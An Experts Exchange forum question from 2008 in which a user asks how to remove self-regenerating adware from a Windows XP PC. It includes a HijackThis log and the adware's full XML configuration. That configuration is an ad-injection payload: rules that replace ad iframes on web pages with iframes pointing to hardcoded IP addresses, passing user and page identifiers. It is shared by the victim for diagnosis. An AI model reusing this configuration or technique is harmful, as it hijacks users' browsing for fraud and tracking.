Question

Help me remove persistent malware

Asked by: steve0412

Hi

I have a problem with a PC in that some malware seems to get half removed by McAfee, which leaves the web pages incompletely loaded. Ok, I have solved that by using Opera BUT, I cannot get rid of this pest. I use McAfee, Spy Hunterm Uniblue Spy Eraser and RogueRemover pro-nothing will shift this.

It starts with an XML page that regenerates itself when removed.(see end of this question for the content). This appears in the HKLM Run section, to run Rundll32.exe (from the system32 directory via prefetching commands) This in turn runs a dll, which is in the system32 directory. This malware even logs on as another user (I have since changed the log on to a guest and with password control to try and prevent this).

Hre is the HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:26:24, on 27-01-2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programmer\Fælles filer\McAfee\HackerWatch\HWAPI.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\programmer\fælles filer\mcafee\mna\mcnasvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
c:\PROGRA~1\FÆLLES~1\mcafee\mcproxy\mcproxy.exe
c:\PROGRA~1\FÆLLES~1\mcafee\redirsvc\redirsvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
C:\Programmer\McAfee\MPF\MPFSrv.exe
C:\PROGRA~1\McAfee\MPS\mps.exe
C:\Programmer\McAfee\MSK\MskSrver.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\Programmer\SiteAdvisor\6253\SAService.exe
C:\WINDOWS\system32\svchost.exe
C:\Programmer\McAfee\MSK\MskAgent.exe
C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
C:\WINDOWS\StartupMonitor.exe
C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programmer\HP\Digital Imaging\bin\hpqtra08.exe
C:\Programmer\McAfee\MPS\mpsevh.exe
C:\Programmer\HP\Digital Imaging\bin\hpqimzone.exe
c:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\WINDOWS\System32\alg.exe
C:\Programmer\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Programmer\HP\Digital Imaging\Product Assistant\bin\hprblog.exe
C:\Documents and Settings\Anne\Skrivebord\Startup.exe
C:\WINDOWS\system32\HPZinw12.exe
C:\WINDOWS\regedit.exe
C:\Documents and Settings\Anne\Skrivebord\HiJackThis.exe
C:\PROGRAM FILES\PROCESS EXPLORER\PROCEXP.EXE
C:\WINDOWS\explorer.exe
C:\Programmer\Opera\Opera.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://dellsearchedit.myway.com/samisc/dellsidebar.jhtml?p=DJ
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.epilepsiforeningen.dk/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hyperlinks
O3 - Toolbar: McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Programmer\SiteAdvisor\6253\SiteAdv.dll
O4 - HKLM\..\Run: [DLA] C:\WINDOWS\System32\DLA\DLACTRLW.EXE
O4 - HKLM\..\Run: [MskAgentexe] C:\Programmer\McAfee\MSK\MskAgent.exe
O4 - HKLM\..\Run: [SiteAdvisor] C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
O4 - HKLM\..\Run: [Run StartupMonitor] StartupMonitor.exe
O4 - HKLM\..\Run: [Spyhunter Security Suite] "C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe" -minimized
O4 - HKLM\..\Run: [BM870dc8a8] Rundll32.exe "C:\WINDOWS\system32\sslnpilc.dll",s
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKAL TJENESTE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETVÆRKSTJENESTE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Programmer\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Programmer\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: HP Image Zone Hurtig start.lnk = C:\Programmer\HP\Digital Imaging\bin\hpqthb08.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Programmer\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Send til &Bluetooth-enhed... - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: FirstClass® - {02011FE3-C22B-451d-9A25-BF4DBB38B8E7} - C:\WINDOWS\Downloaded Program Files\fcplugin.dll
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O16 - DPF: {11818680-FCF6-11D0-9808-0800092A4865} (Adobe Form Control) - http://www.kps.dk/Codebase/FormCtl.cab
O16 - DPF: {1469FF24-47F6-11D2-8805-006008C537E3} (Adobe Mail Control) - http://www.kps.dk/codebase/ffmail.cab
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.mcafee.com/molbin/shared/mcinsctl/4,0,0,101/mcinsctl.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1201280089546
O16 - DPF: {9C196458-4145-46AF-8A77-1506878DFECA} (FirstClass® Control) - ftp://ftp.sektornet.dk/sektornet/skolekom/fcplugin.cab
O16 - DPF: {CDDCFBB3-4D93-11D2-B1A9-00A0C9B742BE} (Adobe Script Object) - http://www.kps.dk/codebase/scriptobject.cab
O16 - DPF: {D8575CE3-3432-4540-88A9-85A1325D3375} (e-Safekey) - https://netbank.danskebank.dk/html/activex/e-Safekey/DB/e-Safekey.cab
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Programmer\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: McAfee E-mail Proxy (Emproxy) - McAfee, Inc. - C:\PROGRA~1\FÆLLES~1\McAfee\EmProxy\emproxy.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programmer\Fælles filer\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Programmer\iPod\bin\iPodService.exe
O23 - Service: McAfee HackerWatch Service - McAfee, Inc. - C:\Programmer\Fælles filer\McAfee\HackerWatch\HWAPI.exe
O23 - Service: McAfee Update Manager (mcmispupdmgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcupdmgr.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - c:\programmer\fælles filer\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Protection Manager (mcpromgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - c:\PROGRA~1\FÆLLES~1\mcafee\mcproxy\mcproxy.exe
O23 - Service: McAfee Redirector Service (McRedirector) - McAfee, Inc. - c:\PROGRA~1\FÆLLES~1\mcafee\redirsvc\redirsvc.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee SystemGuards (McSysmon) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Programmer\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee Privacy Service (MPS9) - McAfee, Inc. - C:\PROGRA~1\McAfee\MPS\mps.exe
O23 - Service: McAfee SpamKiller Service (MSK80Service) - McAfee Inc. - C:\Programmer\McAfee\MSK\MskSrver.exe
O23 - Service: Intel NCS NetService (NetSvc) - Intel(R) Corporation - C:\Programmer\Intel\PROSetWired\NCS\Sync\NetSvc.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SiteAdvisor-tjeneste (SiteAdvisor Service) - Unknown owner - C:\Programmer\SiteAdvisor\6253\SAService.exe

--
End of file - 8833 bytes


(See the HKLM entry for BM870dc8a8)

BM870dc8a8 is this:

<ROOT><CAMPAIGNLIST><CAMPAIGN name="120x240" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x240;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='ae4390b5' name='ae4390b5' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x240&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='240'><a href='http://85.12.43.83/www/delivery/ck.php?n=ad03d9ca' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=35&n=ad03d9ca' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="120x600" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x600;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a57232fb' name='a57232fb' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x600&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='600'><a href='http://85.12.43.83/www/delivery/ck.php?n=a2d7629e' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=36&n=a2d7629e' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="120x90" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x90;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a8c6b7cd' name='a8c6b7cd' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x90&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='90'><a href='http://85.12.43.83/www/delivery/ck.php?n=a0118327' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=37&n=a0118327' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="125x125" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?125['"]?)|(HEIGHT=['"]?125['"]?))+[^>]*?((WIDTH=['"]?125['"]?)|(HEIGHT=['"]?125['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=125x125;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a6ea2661' name='a6ea2661' src='http://85.17.166.173/go/?cmp=nm_bm3s_125x125&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='125' height='125'><a href='http://85.12.43.83/www/delivery/ck.php?n=afe4b666' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=38&n=afe4b666' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="160x600" id="20080124"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=160x600;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a8a9405d' name='a8a9405d' src='http://85.17.166.173/go/?cmp=nm_bm3s_160x600&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='160' height='600'></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="180x150" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?180['"]?)|(HEIGHT=['"]?150['"]?))+[^>]*?((WIDTH=['"]?180['"]?)|(HEIGHT=['"]?150['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=180x150;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aa44b86f' name='aa44b86f' src='http://85.17.166.173/go/?cmp=nm_bm3s_180x150&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='180' height='150'><a href='http://85.12.43.83/www/delivery/ck.php?n=a935a5aa' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=39&n=a935a5aa' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="234x60" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?234['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?((WIDTH=['"]?234['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=234x60;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a80f0628' name='a80f0628' src='http://85.17.166.173/go/?cmp=nm_bm3s_234x60&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='234' height='60'><a href='http://85.12.43.83/www/delivery/ck.php?n=a61ab872' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=40&n=a61ab872' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="240x400" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?240['"]?)|(HEIGHT=['"]?400['"]?))+[^>]*?((WIDTH=['"]?240['"]?)|(HEIGHT=['"]?400['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=240x400;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a4da5d34' name='a4da5d34' src='http://85.17.166.173/go/?cmp=nm_bm3s_240x400&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='240' height='400'><a href='http://85.12.43.83/www/delivery/ck.php?n=a424da19' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=41&n=a424da19' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="250x250" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?250['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?((WIDTH=['"]?250['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=250x250;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='ad90e55d' name='ad90e55d' src='http://85.17.166.173/go/?cmp=nm_bm3s_250x250&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='250' height='250'><a href='http://85.12.43.83/www/delivery/ck.php?n=ac032ecf' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=42&n=ac032ecf' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="300x100" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?100['"]?))+[^>]*?((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?100['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=300x100;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a1111aad' name='a1111aad' src='http://85.17.166.173/go/?cmp=nm_bm3s_300x100&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='300' height='100'><a href='http://85.12.43.83/www/delivery/ck.php?n=a8b2301d' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=43&n=a8b2301d' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="300x250" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=300x250;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a7b91358' name='a7b91358' src='http://85.17.166.173/go/?cmp=nm_bm3s_300x250&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='300' height='250'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa619a73' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=44&n=aa619a73' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="336x280" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?336['"]?)|(HEIGHT=['"]?280['"]?))+[^>]*?((WIDTH=['"]?336['"]?)|(HEIGHT=['"]?280['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=336x280;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a1e38bd4' name='a1e38bd4' src='http://85.17.166.173/go/?cmp=nm_bm3s_336x280&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='336' height='280'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa2664b8' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=45&n=aa2664b8' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="468x60" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?468['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?((WIDTH=['"]?468['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=468x60;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a24b320b' name='a24b320b' src='http://85.17.166.173/go/?cmp=nm_bm3s_468x60&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='468' height='60'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa173903' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=46&n=aa173903' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="720x300" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?720['"]?)|(HEIGHT=['"]?300['"]?))+[^>]*?((WIDTH=['"]?720['"]?)|(HEIGHT=['"]?300['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=720x300;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aaf81f87' name='aaf81f87' src='http://85.17.166.173/go/?cmp=nm_bm3s_720x300&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='720' height='300'><a href='http://85.12.43.83/www/delivery/ck.php?n=afb3d0f9' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=47&n=afb3d0f9' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="728x90" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?728['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?((WIDTH=['"]?728['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=728x90;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aff78e03' name='aff78e03' src='http://85.17.166.173/go/?cmp=nm_bm3s_728x90&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='728' height='90'><a href='http://85.12.43.83/www/delivery/ck.php?n=a8ac5ed4' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=48&n=a8ac5ed4' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN></CAMPAIGNLIST><COOKIES><COOKIE>ip=ODcuNjAuOTYuOTA#</COOKIE><COOKIE>country=REs#</COOKIE><COOKIE>network=Ym0#</COOKIE></COOKIES></ROOT>

Has anyone got ANY idea how to remove the mechanism that regenerates this pest? The IP address resolves to Breda in Holland.

This Question has been solved and asker verified All Experts Exchange premium technology solutions are available to subscription members.

Subscribe now for full access to Experts Exchange and get

Instant Access to this Solution

  • Plus...
  • 30 Day FREE access, no risk, no obligation
  • Collaborate with the world's top tech experts
  • Unlimited access to our exclusive solution database
  • Never be left without tech help again

Subscribe Now

Asked On
2008-01-27 at 13:31:57ID23115046
Topics

HijackThis Software

,

Windows XP Operating System

,

Anti-Spyware

Participating Experts
5
Points
250
Comments
36

Trusted by hundreds of thousands everyday for fast, accurate and reliable tech support.

  • "The time we save is the biggest benefit of Experts Exchange to Warner Bros. What could take multiple guys 2 hours or more each to find is accessed in around 15 minutes on Experts Exchange." Mike Kapnisakis, Warner Bros.
  • "Our team likes having a resource that is more secure than just using Google and most experts using this service really know their stuff. It's nice to look here first versus using Google." Dayna Sellner, Lockheed Martin
  • "Anytime that I've been stumped with a problem, 9 out of 10 times Experts Exchange has either the accepted solution or an open discussion of the potential solution to the problem." Kenny Red, eBay Inc.

See what Experts Exchange can do for you.

Got a question?

We've got the answer.

Experts Exchange has been collecting answers to technology questions since 1996…3 million and counting! If you have a question, chances are we already have your answer.

Screenshot of Experts Exchange Knowledgebase

Need individual assistance?

Our experts are ready to help.

If you can't find the exact answer you're looking for, ask our exclusive community of 50,000 experts. You’ll get a personalized answer from a trusted professional.

Screenshot of Experts Exchange Knowledgebase

Want to learn from the best?

Read articles from industry experts.

